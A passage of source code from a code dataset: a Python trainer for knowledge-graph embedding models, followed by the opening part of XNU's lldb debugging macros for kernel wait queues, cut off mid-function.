            >>> trainer = Trainer(TransE(**config.__dict__), config)
>>> trainer.build_model()
>>> trainer.train_model()
"""
TRAINED_MODEL_FILE_NAME = "model.vec.pt"
TRAINED_MODEL_CONFIG_NAME = "config.npy"
_logger = Logger().get_logger(__name__)
def __init__(self, model, config):
self.model = model
self.config = config
self.best_metric = None
self.monitor = None
self.training_results = []
self.evaluator = None
self.generator = None
self.optimizer = None
self.early_stopper = None
def build_model(self, monitor=Monitor.FILTERED_MEAN_RANK):
"""function to build the model"""
if self.config.load_from_data is not None:
self.load_model(self.config.load_from_data)
self.evaluator = Evaluator(self.model, self.config)
self.model.to(self.config.device)
if self.config.optimizer == "adam":
self.optimizer = optim.Adam(
self.model.parameters(),
lr=self.config.learning_rate,
)
elif self.config.optimizer == "sgd":
self.optimizer = optim.SGD(
self.model.parameters(),
lr=self.config.learning_rate,
)
elif self.config.optimizer == "adagrad":
self.optimizer = optim.Adagrad(
self.model.parameters(),
lr=self.config.learning_rate,
)
elif self.config.optimizer == "rms":
self.optimizer = optim.RMSprop(
self.model.parameters(),
lr=self.config.learning_rate,
)
else:
raise NotImplementedError("No support for %s optimizer" % self.config.optimizer)
self.config.summary()
self.early_stopper = EarlyStopper(self.config.patience, monitor)
# Training related functions:
def train_step_pairwise(self, pos_h, pos_r, pos_t, neg_h, neg_r, neg_t):
pos_preds = self.model(pos_h, pos_r, pos_t)
neg_preds = self.model(neg_h, neg_r, neg_t)
if self.config.sampling == 'adversarial_negative_sampling':
# RotatE: Adversarial Negative Sampling and alpha is the temperature.
pos_preds = -pos_preds
neg_preds = -neg_preds
pos_preds = F.logsigmoid(pos_preds)
neg_preds = neg_preds.view((-1, self.config.neg_rate))
softmax = nn.Softmax(dim=1)(neg_preds*self.config.alpha).detach()
neg_preds = torch.sum(softmax * (F.logsigmoid(-neg_preds)), dim=-1)
loss = -neg_preds.mean() - pos_preds.mean()
else:
# others that use margin-based & pairwise loss function. (uniform or bern)
loss = pos_preds + self.config.margin - neg_preds
loss = torch.max(loss, torch.zeros_like(loss)).sum()
if hasattr(self.model, 'get_reg'):
# now only NTN uses regularizer,
# other pairwise based KGE methods use normalization to regularize parameters.
loss += self.model.get_reg()
return loss
def train_step_projection(self, h, r, t, hr_t, tr_h):
if self.model.model_name.lower() == "conve" or self.model.model_name.lower() == "tucker":
if hasattr(self.config, 'label_smoothing'):
hr_t = hr_t * (1.0 - self.config.label_smoothing) + 1.0 / self.config.tot_entity
tr_h = tr_h * (1.0 - self.config.label_smoothing) + 1.0 / self.config.tot_entity
pred_tails = self.model(h, r, direction="tail") # (h, r) -> hr_t forward
pred_heads = self.model(t, r, direction="head") # (t, r) -> tr_h backward
loss_tails = torch.mean(F.binary_cross_entropy(pred_tails, hr_t))
loss_heads = torch.mean(F.binary_cross_entropy(pred_heads, tr_h))
loss = loss_tails + loss_heads
else:
loss_tails = self.model(h, r, hr_t, direction="tail") # (h, r) -> hr_t forward
loss_heads = self.model(t, r, tr_h, direction="head") # (t, r) -> tr_h backward
loss = loss_tails + loss_heads
if hasattr(self.model, 'get_reg'):
# now only complex distmult uses regularizer in algorithms,
loss += self.model.get_reg()
return loss
def train_step_pointwise(self, h, r, t, y):
preds = self.model(h, r, t)
loss = F.softplus(y*preds).mean()
if hasattr(self.model, 'get_reg'): # for complex & complex-N3 & DistMult & CP & ANALOGY
loss += self.model.get_reg(h, r, t)
return loss
def train_model(self):
"""Function to train the model."""
self.generator = Generator(self.model, self.config)
self.monitor = Monitor.FILTERED_MEAN_RANK
for cur_epoch_idx in range(self.config.epochs):
self._logger.info("Epoch[%d/%d]" % (cur_epoch_idx, self.config.epochs))
self.train_model_epoch(cur_epoch_idx)
if cur_epoch_idx % self.config.test_step == 0:
self.model.eval()
metrics = self.evaluator.mini_test(cur_epoch_idx)
if self.early_stopper.should_stop(metrics):
### Early Stop Mechanism
### start to check if the metric is still improving after each mini-test.
### Example, if test_step == 5, the trainer will check metrics every 5 epoch.
break
# store the best model weights.
if self.config.save_model:
if self.best_metric is None:
self.best_metric = metrics
self.save_model()
else:
if self.monitor == Monitor.MEAN_RANK or self.monitor == Monitor.FILTERED_MEAN_RANK:
is_better = self.best_metric[self.monitor.value] > metrics[self.monitor.value]
else:
is_better = self.best_metric[self.monitor.value] < metrics[self.monitor.value]
if is_better:
self.save_model()
self.best_metric = metrics
self.evaluator.full_test(cur_epoch_idx)
self.evaluator.metric_calculator.save_test_summary(self.model.model_name)
self.generator.stop()
self.save_training_result()
if self.config.disp_result:
self.display()
self.export_embeddings()
        return cur_epoch_idx  # index of the last epoch that was run
def tune_model(self):
"""Function to tune the model."""
current_loss = float("inf")
self.generator = Generator(self.model, self.config)
self.evaluator = Evaluator(self.model, self.config, tuning=True)
for cur_epoch_idx in range(self.config.epochs):
current_loss = self.train_model_epoch(cur_epoch_idx, tuning=True)
self.evaluator.full_test(cur_epoch_idx)
self.generator.stop()
return current_loss
def train_model_epoch(self, epoch_idx, tuning=False):
"""Function to train the model for one epoch."""
acc_loss = 0
num_batch = self.config.tot_train_triples // self.config.batch_size if not self.config.debug else 10
self.generator.start_one_epoch(num_batch)
progress_bar = tqdm(range(num_batch))
for _ in progress_bar:
data = list(next(self.generator))
self.model.train()
self.optimizer.zero_grad()
if self.model.training_strategy == TrainingStrategy.PROJECTION_BASED:
h = torch.LongTensor(data[0]).to(self.config.device)
r = torch.LongTensor(data[1]).to(self.config.device)
t = torch.LongTensor(data[2]).to(self.config.device)
hr_t = data[3].to(self.config.device)
tr_h = data[4].to(self.config.device)
loss = self.train_step_projection(h, r, t, hr_t, tr_h)
elif self.model.training_strategy == TrainingStrategy.POINTWISE_BASED:
h = torch.LongTensor(data[0]).to(self.config.device)
r = torch.LongTensor(data[1]).to(self.config.device)
t = torch.LongTensor(data[2]).to(self.config.device)
y = torch.LongTensor(data[3]).to(self.config.device)
loss = self.train_step_pointwise(h, r, t, y)
elif self.model.training_strategy == TrainingStrategy.PAIRWISE_BASED:
pos_h = torch.LongTensor(data[0]).to(self.config.device)
pos_r = torch.LongTensor(data[1]).to(self.config.device)
pos_t = torch.LongTensor(data[2]).to(self.config.device)
neg_h = torch.LongTensor(data[3]).to(self.config.device)
neg_r = torch.LongTensor(data[4]).to(self.config.device)
neg_t = torch.LongTensor(data[5]).to(self.config.device)
loss = self.train_step_pairwise(pos_h, pos_r, pos_t, neg_h, neg_r, neg_t)
else:
raise NotImplementedError("Unknown training strategy: %s" % self.model.training_strategy)
loss.backward()
self.optimizer.step()
acc_loss += loss.item()
if not tuning:
                progress_bar.set_description('acc_loss: %f, cur_loss: %f' % (acc_loss, loss))
self.training_results.append([epoch_idx, acc_loss])
return acc_loss
def enter_interactive_mode(self):
self.build_model()
self.load_model()
self._logger.info("""The training/loading of the model has finished!
Now enter interactive mode :)
-----
Example 1: trainer.infer_tails(1,10,topk=5)""")
self.infer_tails(1, 10, topk=5)
self._logger.info("""-----
Example 2: trainer.infer_heads(10,20,topk=5)""")
self.infer_heads(10, 20, topk=5)
self._logger.info("""-----
Example 3: trainer.infer_rels(1,20,topk=5)""")
self.infer_rels(1, 20, topk=5)
def exit_interactive_mode(self):
self._logger.info("Thank you for trying out inference interactive script :)")
def infer_tails(self, h, r, topk=5):
tails = self.evaluator.test_tail_rank(h, r, topk).cpu().numpy()
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
logs = [
"",
"(head, relation)->({},{}) :: Inferred tails->({})".format(h, r, ",".join([str(i) for i in tails])),
"",
"head: %s" % idx2ent[h],
"relation: %s" % idx2rel[r],
]
for idx, tail in enumerate(tails):
logs.append("%dth predicted tail: %s" % (idx, idx2ent[tail]))
self._logger.info("\n".join(logs))
return {tail: idx2ent[tail] for tail in tails}
def infer_heads(self, r, t, topk=5):
heads = self.evaluator.test_head_rank(r, t, topk).cpu().numpy()
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
logs = [
"",
"(relation,tail)->({},{}) :: Inferred heads->({})".format(t, r, ",".join([str(i) for i in heads])),
"",
"tail: %s" % idx2ent[t],
"relation: %s" % idx2rel[r],
]
for idx, head in enumerate(heads):
logs.append("%dth predicted head: %s" % (idx, idx2ent[head]))
self._logger.info("\n".join(logs))
return {head: idx2ent[head] for head in heads}
def infer_rels(self, h, t, topk=5):
if self.model.model_name.lower() in ["proje_pointwise", "conve", "tucker"]:
self._logger.info("%s model doesn't support relation inference in nature.")
return {}
rels = self.evaluator.test_rel_rank(h, t, topk).cpu().numpy()
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
logs = [
"",
"(head,tail)->({},{}) :: Inferred rels->({})".format(h, t, ",".join([str(i) for i in rels])),
"",
"head: %s" % idx2ent[h],
"tail: %s" % idx2ent[t],
]
for idx, rel in enumerate(rels):
logs.append("%dth predicted rel: %s" % (idx, idx2rel[rel]))
self._logger.info("\n".join(logs))
return {rel: idx2rel[rel] for rel in rels}
# Procedural functions
def save_model(self):
"""Function to save the model."""
saved_path = self.config.path_tmp / self.model.model_name
saved_path.mkdir(parents=True, exist_ok=True)
torch.save(self.model.state_dict(), str(saved_path / self.TRAINED_MODEL_FILE_NAME))
"""Save hyper-parameters into a yaml file with the model"""
save_path_config = saved_path / self.TRAINED_MODEL_CONFIG_NAME
np.save(save_path_config, self.config)
def load_model(self, model_path=None):
"""Function to load the model."""
if model_path is None:
model_path = self.config.path_tmp / self.model.model_name / self.TRAINED_MODEL_FILE_NAME
model_path_file = self.config.path_tmp / self.model.model_name / self.TRAINED_MODEL_FILE_NAME
model_path_config = self.config.path_tmp / self.model.model_name / self.TRAINED_MODEL_CONFIG_NAME
else:
model_path = Path(model_path)
model_path_file = model_path / self.TRAINED_MODEL_FILE_NAME
model_path_config = model_path / self.TRAINED_MODEL_CONFIG_NAME
if model_path_file.exists() and model_path_config.exists():
config_temp = np.load(model_path_config, allow_pickle=True).item()
# for key, value in config_temp.__dict__.items():
# print(key, " ", value)
self.config.__dict__['lmbda'] = config_temp.__dict__['lmbda']
self.config.__dict__['l1_flag'] = config_temp.__dict__['l1_flag']
self.config.__dict__['learning_rate'] = config_temp.__dict__['learning_rate']
self.config.__dict__['hidden_size'] = config_temp.__dict__['hidden_size']
self.config.__dict__['batch_size'] = config_temp.__dict__['batch_size']
self.config.__dict__['epochs'] = config_temp.__dict__['epochs']
self.config.__dict__['margin'] = config_temp.__dict__['margin']
self.config.__dict__['optimizer'] = config_temp.__dict__['optimizer']
self.config.__dict__['sampling'] = config_temp.__dict__['sampling']
self.config.__dict__['neg_rate'] = config_temp.__dict__['neg_rate']
self.model.__init__(**self.config.__dict__)
self.model.load_state_dict(torch.load(str(model_path_file)))
self.model.eval()
else:
raise ValueError("Cannot load model from %s" % model_path_file)
def display(self):
"""Function to display embedding."""
options = {"ent_only_plot": True,
"rel_only_plot": not self.config.plot_entity_only,
"ent_and_rel_plot": not self.config.plot_entity_only}
if self.config.plot_embedding:
viz = Visualization(self.model, self.config, vis_opts=options)
viz.plot_embedding(resultpath=self.config.path_figures, algos=self.model.model_name, show_label=False)
if self.config.plot_training_result:
viz = Visualization(self.model, self.config)
viz.plot_train_result()
if self.config.plot_testing_result:
viz = Visualization(self.model, self.config)
viz.plot_test_result()
def export_embeddings(self):
"""
Export embeddings in tsv and pandas pickled format.
With the TSVs (both label and vector files), you can:
1) Use the pretrained embeddings in your own applications.
2) Visualize the embeddings at https://projector.tensorflow.org/ to gain insights.
Pandas dataframes can be read with pd.read_pickle('desired_file.pickle')
"""
save_path = self.config.path_embeddings / self.model.model_name
save_path.mkdir(parents=True, exist_ok=True)
idx2ent = self.config.knowledge_graph.read_cache_data('idx2entity')
idx2rel = self.config.knowledge_graph.read_cache_data('idx2relation')
with open(str(save_path / "ent_labels.tsv"), 'w') as l_export_file:
for label in idx2ent.values():
l_export_file.write(label + "\n")
with open(str(save_path / "rel_labels.tsv"), 'w') as l_export_file:
for label in idx2rel.values():
l_export_file.write(label + "\n")
for named_embedding in self.model.parameter_list:
all_ids = list(range(0, int(named_embedding.weight.shape[0])))
stored_name = named_embedding.name
if len(named_embedding.weight.shape) == 2:
all_embs = named_embedding.weight.detach().cpu().numpy()
with open(str(save_path / ("%s.tsv" % stored_name)), 'w') as v_export_file:
for idx in all_ids:
v_export_file.write("\t".join([str(x) for x in all_embs[idx]]) + "\n")
def save_training_result(self):
"""Function that saves training result"""
files = os.listdir(str(self.config.path_result))
l = len([f for f in files if self.model.model_name in f and 'Training' in f])
df = pd.DataFrame(self.training_results, columns=['Epochs', 'Loss'])
with open(str(self.config.path_result / (self.model.model_name + '_Training_results_' + str(l) + '.csv')),
'w') as fh:
df.to_csv(fh)
| 41.250988 | 114 | 0.601111 |
8bfa6391903d99cee429b5a4f44fcabb34f25192 | 42,670 | py | Python | objc4/openSources/xnu-4570.71.2/tools/lldbmacros/waitq.py | honeyeeb/objc4-723 | 020a0dd480818207211835aefe04f44007c09575 | [
"MIT"
] | null | null | null | objc4/openSources/xnu-4570.71.2/tools/lldbmacros/waitq.py | honeyeeb/objc4-723 | 020a0dd480818207211835aefe04f44007c09575 | [
"MIT"
] | null | null | null | objc4/openSources/xnu-4570.71.2/tools/lldbmacros/waitq.py | honeyeeb/objc4-723 | 020a0dd480818207211835aefe04f44007c09575 | [
"MIT"
] | null | null | null | from xnu import *
from utils import *
from core.configuration import *
import sys
def GetWaitqStateStr(waitq):
wq_types = {
0: 'INV',
1: '???',
2: ' Q',
3: 'SET'
}
return wq_types[int(waitq.waitq_type)]
def GetWaitqBitsStr(waitq):
out_str = ""
if (Cast(waitq.waitq_interlock, 'int') != 0):
if waitq.waitq_irq:
out_str += '!'
else:
out_str += '*'
if waitq.waitq_fifo:
out_str += 'F'
if waitq.waitq_prepost:
out_str += 'P'
if waitq.waitq_irq:
out_str += 'I'
return out_str
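# Legend for the flag string built above (derived from the code, for quick reference):
#   '!' interlock held on an IRQ-safe waitq, '*' interlock held otherwise,
#   'F' FIFO waitq, 'P' prepost-enabled, 'I' IRQ-safe.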
def WaitqTableElemType(e):
type = (e.wqte.lt_bits >> 29) & 0x3
wqe_type = {
0: 'FREE',
1: 'ELEM',
2: 'LINK',
3: 'RSVD'
}
return wqe_type[type]
def WaitqTableElemId(e):
return e.wqte.lt_id.id
def WaitqTableElemValid(e):
if unsigned(e) == 0:
return 0
return (e.wqte.lt_bits & 0x80000000) == 0x80000000
def WaitqTableElemRefcnt(e):
return (e.wqte.lt_bits & 0x1fffffff)
def WaitqTableIdxFromId(id):
if hasattr(kern.globals, 'g_lt_idx_max'):
idx = id & unsigned(kern.globals.g_lt_idx_max)
else:
# best guess
idx = id & 0x000000000003ffff
return int(idx)
def WaitqTableGenFromId(id):
if hasattr(kern.globals, 'g_lt_idx_max'):
msk = ~unsigned(kern.globals.g_lt_idx_max)
else:
# best guess
msk = ~0x000000000003ffff
shift = 0
while (msk & 0x1) == 0:
msk >>= 1
shift += 1
return (unsigned(id) >> shift) & msk
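# Worked example for the two helpers above, assuming the fallback index mask 0x3ffff (18 bits):
# the low 18 bits of a table ID are the slot index and the bits above them are the generation,
# so a hypothetical id = 0x4000000123 decomposes into idx = 0x123 and gen = 0x100000.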
def GetWaitqLink(id):
if int(id) == 0:
return 0, "NULL link id"
idx = WaitqTableIdxFromId(id)
if idx >= kern.globals.g_wqlinktable.nelem:
return 0, "Invalid waitq link table id: {:d}".format(id)
slab_slot = idx / kern.globals.g_wqlinktable.slab_elem;
slab = kern.globals.g_wqlinktable.table[int(slab_slot)]
if slab == 0:
return 0, "Invalid waitq link table id: {:s} (invalid slab)".format(str(id))
first_elem = Cast(slab, 'lt_elem *')
addr = int(slab) + ((idx - first_elem.lt_id.idx) * int(kern.globals.g_wqlinktable.elem_sz))
link = kern.GetValueFromAddress(addr, 'waitq_link *')
gen = WaitqTableGenFromId(id)
warn_str = ''
if gen > 0 and link.wqte.lt_id.generation != gen:
warn_str = "WARNING: found idx:{:d}/gen:{:d}, but requested idx:{:d}/gen:{:d}".format(link.wqte.lt_id.idx, link.wqte.lt_id.generation, idx, gen)
link = 0
return link, warn_str
def GetWaitqPrepost(id):
idx = WaitqTableIdxFromId(id)
if idx > int(kern.globals.g_prepost_table.nelem):
warn_str = "Invalid waitq prepost table id {:s}".format(str(id))
return 0, warn_str
slab_slot = idx / kern.globals.g_prepost_table.slab_elem;
slab = kern.globals.g_prepost_table.table[int(slab_slot)]
if slab == 0:
warn_str = "Invalid waitq prepost table id:", str(id), " (invalid slab)"
return 0, warn_str
first_elem = Cast(slab, 'lt_elem *')
addr = int(slab) + ((idx - first_elem.lt_id.idx) * int(kern.globals.g_prepost_table.elem_sz))
wqp = kern.GetValueFromAddress(addr, 'wq_prepost *')
gen = WaitqTableGenFromId(id)
warn_str = ''
if gen > 0 and wqp.wqte.lt_id.generation != gen:
warn_str = "WARNING: found idx:{:d}/gen:{:d}, but requested idx:{:d}/gen:{:d}".format(wqp.wqte.lt_id.idx, wqp.wqte.lt_id.generation, idx, gen)
wqp = 0
return wqp, warn_str
def GetWaitqSetidString(setid):
idx = WaitqTableIdxFromId(setid)
gen = WaitqTableGenFromId(setid)
# This must match the format used in WaitqSetsFromLink
str = "{:>7d}/{:<#14x}".format(unsigned(idx), unsigned(gen))
return str
def WaitqSetsFromLink(link, sets, depth):
if int(link) == 0:
sets.append("{: <22s}".format("<link:NULL>"))
return
if WaitqTableElemType(link) == "ELEM":
#sets.append("{: <#18x}".format(unsigned(link.wql_wqs.wql_set)))
#sets.append("{:>7d}/{:<#14x}".format(unsigned(id.idx),unsigned(id.generation)))
sets.append(GetWaitqSetidString(link.wqte.lt_id.id))
return
if depth >= 950:
sets.append("{: <22s}".format("!recursion limit!"))
return
left_link = GetWaitqLink(link.wql_link.left_setid)[0]
right_link = GetWaitqLink(link.wql_link.right_setid)[0]
WaitqSetsFromLink(left_link, sets, depth + 1)
WaitqSetsFromLink(right_link, sets, depth + 1)
return
def GetWaitqSets(waitq):
sets = []
if int(waitq) == 0:
return sets
if waitq.waitq_set_id == 0:
return sets
link = GetWaitqLink(waitq.waitq_set_id)[0]
WaitqSetsFromLink(link, sets, 0)
return sets
def GetFrameString(pc, compact=True):
str = GetSourceInformationForAddress(unsigned(pc))
if compact:
return re.sub(r'.*0x[0-9a-f]+\s+<(\w+)( \+ 0x[0-9a-f]+)*>.*', r'\1', str, re.UNICODE)
else:
return re.sub(r'.*(0x[0-9a-f]+)\s+<(\w+)( \+ 0x[0-9a-f]+)*>.*', r'\2(\1)', str, re.UNICODE)
@lldb_type_summary(['waitq_link', 'waitq_link *'])
@header("{:<18s} {:<18s} {:<19s} {:<10s} {:<1s} {:<4s} {:<10s} {:<20s}".format('addr','id','idx','gen','V','type','refcnt','info'))
def GetWaitqSetidLinkSummary(link, verbose=False):
has_stats = 0
if not link:
return ""
fmt_str = "{l: <#18x} {l.wqte.lt_id.id: <#18x} {l.wqte.lt_id.idx: <7d} (->{l.wqte.lt_next_idx: <7d}) {l.wqte.lt_id.generation: <#10x} {v: <1s} {t: <4s} {rcnt: <10d} "
if hasattr(link, 'sl_alloc_task'):
has_stats = 1
fmt_str += "owner:{l.sl_alloc_task: <#x}/th:{l.sl_alloc_th: <#x}\n"
fmt_str += ' '*87
try:
pid = GetProcPIDForTask(link.sl_alloc_task)
except:
pid = unsigned(link.sl_alloc_task.audit_token.val[5])
pidnm = ""
if pid < 0:
pidnm = "DEAD:{:s}".format(GetProcNameForTask(link.sl_alloc_task))
else:
pidnm += GetProcNameForPid(pid)
fmt_str += " ({:d}/{:s}), ".format(pid, pidnm)
type = WaitqTableElemType(link)
if type == "ELEM":
type = "WQS"
v = "F"
if WaitqTableElemValid(link):
v = "T"
refcnt = WaitqTableElemRefcnt(link)
out_str = fmt_str.format(l=link, v=v, t=type, rcnt=refcnt)
if type == "WQS":
out_str += "wqs:{0: <#18x}".format(unsigned(link.wql_wqs.wql_set))
elif type == "LINK":
lID = link.wql_link.left_setid
rID = link.wql_link.right_setid
left = GetWaitqLink(lID)[0]
right = GetWaitqLink(rID)[0]
ltype = "<invalid>"
if WaitqTableElemValid(left):
ltype = WaitqTableElemType(left)
if ltype == "ELEM":
ltype = "WQS"
rtype = "<invalid>"
if WaitqTableElemValid(right):
rtype = WaitqTableElemType(right)
if rtype == "ELEM":
rtype = "WQS"
out_str += "left:{:<#x}({:s}), right:{:<#x}({:s})".format(lID, ltype, rID, rtype)
if hasattr(link, 'sl_alloc_bt') and unsigned(link.sl_alloc_bt[0]) > 0:
fmt_str = "\n{:s}alloc_bt({:d}):[".format(' '*87, link.sl_alloc_ts)
f = 0
while f < kern.globals.g_nwaitq_btframes:
fstr = GetFrameString(link.sl_alloc_bt[f], not verbose)
f += 1
if f == kern.globals.g_nwaitq_btframes:
fmt_str += "{:<s}".format(fstr)
else:
fmt_str += "{:<s} <- ".format(fstr)
fmt_str += "]"
out_str += fmt_str
if hasattr(link, 'sl_mkvalid_bt') and unsigned(link.sl_mkvalid_bt[0]) > 0:
fmt_str = "\n{:s}mkvalid_bt({:d}):[".format(' '*87, link.sl_mkvalid_ts)
f = 0
while f < kern.globals.g_nwaitq_btframes:
fstr = GetFrameString(link.sl_mkvalid_bt[f], not verbose)
f += 1
if f == kern.globals.g_nwaitq_btframes:
fmt_str += "{:<s}".format(fstr)
else:
fmt_str += "{:<s} <- ".format(fstr)
fmt_str += "]"
out_str += fmt_str
if hasattr(link, 'sl_invalidate_bt') and unsigned(link.sl_invalidate_bt[0]) > 0:
fmt_str = "\n{:s}invalidate_bt({:d}):[".format(' '*87, link.sl_invalidate_ts)
f = 0
while f < kern.globals.g_nwaitq_btframes:
fstr = GetFrameString(link.sl_invalidate_bt[f], not verbose)
f += 1
if f == kern.globals.g_nwaitq_btframes:
fmt_str += "{:<s}".format(fstr)
else:
fmt_str += "{:<s} <- ".format(fstr)
fmt_str += "]"
out_str += fmt_str
return out_str
def PrintWaitqSetidLinkTree(link, verbose, sets, indent=87):
if not WaitqTableElemType(link) == "LINK":
return
lID = link.wql_link.left_setid
rID = link.wql_link.right_setid
left = GetWaitqLink(lID)[0]
right = GetWaitqLink(rID)[0]
ltype = "<invalid>"
if WaitqTableElemValid(left):
ltype = WaitqTableElemType(left)
if ltype == "ELEM":
ltype = "WQS"
lstr = "L:{:<#x}({:s})".format(lID, ltype)
rtype = "<invalid>"
if WaitqTableElemValid(right):
rtype = WaitqTableElemType(right)
if rtype == "ELEM":
rtype = "WQS"
rstr = "R:{:<#x}({:s})".format(rID, rtype)
if ltype == "WQS":
sets.append(addressof(left.wql_wqs.wql_set.wqset_q))
if rtype == "WQS":
sets.append(addressof(right.wql_wqs.wql_set.wqset_q))
print "{:s}`->{:s}, {:s}".format(' '*indent, lstr, rstr)
if ltype == "WQS":
PrintWaitqSetidLinkTree(right, verbose, sets, indent + len(lstr) + 6);
else:
print "{:s}`->{:s}, {:s}".format(' '*indent, lstr, rstr)
PrintWaitqSetidLinkTree(left, verbose, sets, indent + 4);
PrintWaitqSetidLinkTree(right, verbose, sets, indent + len(lstr) + 6)
return
# Macro: showsetidlink
@lldb_command('showsetidlink', "S:FT")
def ShowSetidLink(cmd_args=None, cmd_options={}):
""" Print waitq_link structure summary
Note: you can pass either a complete ID (generation + index), or
just the index to the -S argument.
usage: showsetidlink [-F] [-S ID] [0xaddr]
-S {ID} : show the setid link whose ID is {ID}
-F : follow the chain of setid structures
and print a summary of each one
-T : print the tree of setidlinks in table format
"""
link = 0
followchain = 0
showtree = 0
verbose = False
if config['verbosity'] > vHUMAN:
verbose = True
if "-T" in cmd_options:
showtree = 1
if "-S" in cmd_options:
id = unsigned(kern.GetValueFromAddress(cmd_options["-S"], 'uint64_t *'))
link, warn_str = GetWaitqLink(id)
if not link:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid link ID {:d}({:<#x}".format(id, id))
if "-F" in cmd_options:
followchain = 1
if link == 0:
if not cmd_args:
raise ArgumentError("Please pass the address of a waitq_link object")
link = kern.GetValueFromAddress(cmd_args[0], 'waitq_link *')
if not link:
raise ArgumentError("Invalid waitq_link {:s}".format(cmd_args[0]))
print GetWaitqSetidLinkSummary.header
print GetWaitqSetidLinkSummary(link, verbose)
if followchain == 1:
next_id = link.wqte.lt_next_idx
max_elem = int(kern.globals.g_wqlinktable.nelem)
if hasattr(kern.globals, 'g_lt_idx_max'):
max_elem = unsigned(kern.globals.g_lt_idx_max)
while link != 0 and next_id < max_elem:
link, warn_str = GetWaitqLink(unsigned(next_id))
if link != 0:
print GetWaitqSetidLinkSummary(link, verbose)
next_id = link.wqte.lt_next_idx
if showtree == 1:
sets = []
print "\nLinkTree:{:<#x}({:s})".format(link.wqte.lt_id.id, WaitqTableElemType(link))
PrintWaitqSetidLinkTree(link, verbose, sets, 9)
if len(sets) > 0:
print "{:d} Sets:".format(len(sets))
for wq in sets:
pp_str = GetWaitqPreposts(wq)
npreposts = len(pp_str)
nps = ""
if npreposts > 0:
if npreposts > 1:
nps = "s: "
else:
nps = ": "
nps += ';'.join(pp_str)
else:
nps = "s"
print "\tWQS:{:<#x} ({:d} prepost{:s})".format(unsigned(wq),npreposts,nps)
# EndMacro: showsetidlink
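# Hypothetical invocations of the macro above (IDs/addresses are placeholders):
#   (lldb) showsetidlink 0xffffff80deadbeef   # summarize a waitq_link by address
#   (lldb) showsetidlink -S 0x123 -F          # look up by ID and follow the chain of links
#   (lldb) showsetidlink -S 0x123 -T          # also print the link tree and its member sets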
@lldb_command('showwaitqlink', "S:FT")
def ShowWaitqLink(cmd_args=None, cmd_options={}):
""" Print waitq_link structure summary
"""
ShowSetidLink(cmd_args, cmd_options)
# Macro: showallsetidlinks
@lldb_command('showallsetidlinks', 'V:T:S:F:XQ')
def ShowAllSetidLinks(cmd_args=None, cmd_options={}):
""" Dump / summarize all waitq set linktable elements
usage: showallsetidlinks [options]
-V {0,1} : only show [1 == valid/live links, 0 == invalid links]
-T {type} : only display objects of type {type}
-S {desc} : only display objects of type {type} which fit {desc}
-T LINK -S {desc} can be:
iL : Invalid left-link pointer (only)
iR : Invalid right-link pointer (only)
iLR : Invalid left+right link pointers
iLRI : Invalid left+right link pointers AND dead allocating process
w/o "-T" -S {desc} can be:
iP : Invalid / Dead allocating process
-F n : summarize the backtraces at frame level 'n'
-X : cross-check waitq pointers in link table
-Q : be quiet, only summarize
"""
opt_summary = 0
opt_type_filt = ""
opt_valid_only = 0
opt_invalid_only = 0
opt_bt_idx = 0
opt_cross_check = 0
opt_validate_links = 0
opt_subtype_filter = 0
verbose = False
if config['verbosity'] > vHUMAN:
verbose = True
if "-Q" in cmd_options:
opt_summary = 1
if "-V" in cmd_options:
if int(cmd_options["-V"]) == 1:
opt_valid_only = 1
elif int(cmd_options["-V"]) == 0:
opt_invalid_only = 1
else:
raise ArgumentError("Invalid parameter to -V '{:s}': expecting 0 or 1".format(cmd_options["-V"]))
if "-X" in cmd_options:
opt_cross_check = 1
nunique_wqs = 0
nduplicated_wqs = 0
max_wqs_dupes = 0
if "-F" in cmd_options:
opt_bt_idx = unsigned(cmd_options["-F"])
if hasattr(kern.globals, "g_nwaitq_btframes"):
if opt_bt_idx >= unsigned(kern.globals.g_nwaitq_btframes):
raise ArgumentError("Invalid BT index '{:s}' max:{:d}".format(cmd_options["-F"], unsigned(kern.globals.g_nwaitq_btframes) - 1))
if "-T" in cmd_options:
opt_type_filt = cmd_options["-T"]
if opt_type_filt == "FREE" or opt_type_filt == "RSVD" or opt_type_filt == "LINK":
pass
elif opt_type_filt == "WQS":
opt_type_filt = "ELEM"
else:
raise ArgumentError("Invalid type filter'{:s}'".format(cmd_options["-T"]))
if "-S" in cmd_options:
opt_subtype_filter = cmd_options["-S"]
if opt_type_filt == "LINK":
if not (opt_subtype_filter == "iL" or \
opt_subtype_filter == "iR" or \
opt_subtype_filter == "iLR" or \
opt_subtype_filter == "iLRI"):
raise ArgumentError("Invalid LINK sub-type filter \{desc\}: {:s}".format(opt_subtype_filter))
elif opt_type_filt == "":
if not opt_subtype_filter == "iP":
raise ArgumentError("Invalid sub-type filter \{desc\}: {:s}".format(opt_subtype_filter))
table = kern.globals.g_wqlinktable
nelem = int(table.nelem)
wq_ptr = {}
bt_summary = {}
nfree = 0
ninv = 0
nwqs = 0
nlink = 0
nrsvd = 0
ninconsistent = 0
hdr_str = "Looking through {:d} waitq_link objects from g_wqlinktable@{:<#x}".format(nelem, addressof(kern.globals.g_wqlinktable))
if opt_type_filt != "" or opt_valid_only != 0:
hdr_str += "\n\t`-> for "
if opt_valid_only:
hdr_str += "valid "
else:
hdr_str += "all "
if opt_type_filt == "":
hdr_str += "objects"
else:
hdr_str += "{:s} objects".format(opt_type_filt)
else:
if opt_valid_only:
hdr_str += "\n\t`-> showing only VALID links"
elif opt_invalid_only:
hdr_str += "\n\t`-> showing only INVALID links"
if opt_subtype_filter != 0:
if opt_type_filt != "LINK" and opt_type_filt != "":
raise ArgumentError("Subtype (-S {desc}) can only be used with (-T LINK) or no type filter at all")
hdr_str += "\n\t`-> filtering {:s} objects through '{:s}'".format(opt_type_filt, opt_subtype_filter)
if opt_cross_check:
hdr_str += "\n\t`-> cross-checking WQS elements for duplicates"
hdr_str += "\n\n"
print hdr_str
if not opt_summary:
print GetWaitqSetidLinkSummary.header
id = 0
while id < nelem:
if id == 0:
# Set a generation count to differentiate from an invalid ID
first_entry = Cast(kern.globals.g_wqlinktable.table[0], 'lt_elem *')
link = GetWaitqLink(first_entry.lt_id.id)[0]
else:
link = GetWaitqLink(id)[0]
if not link:
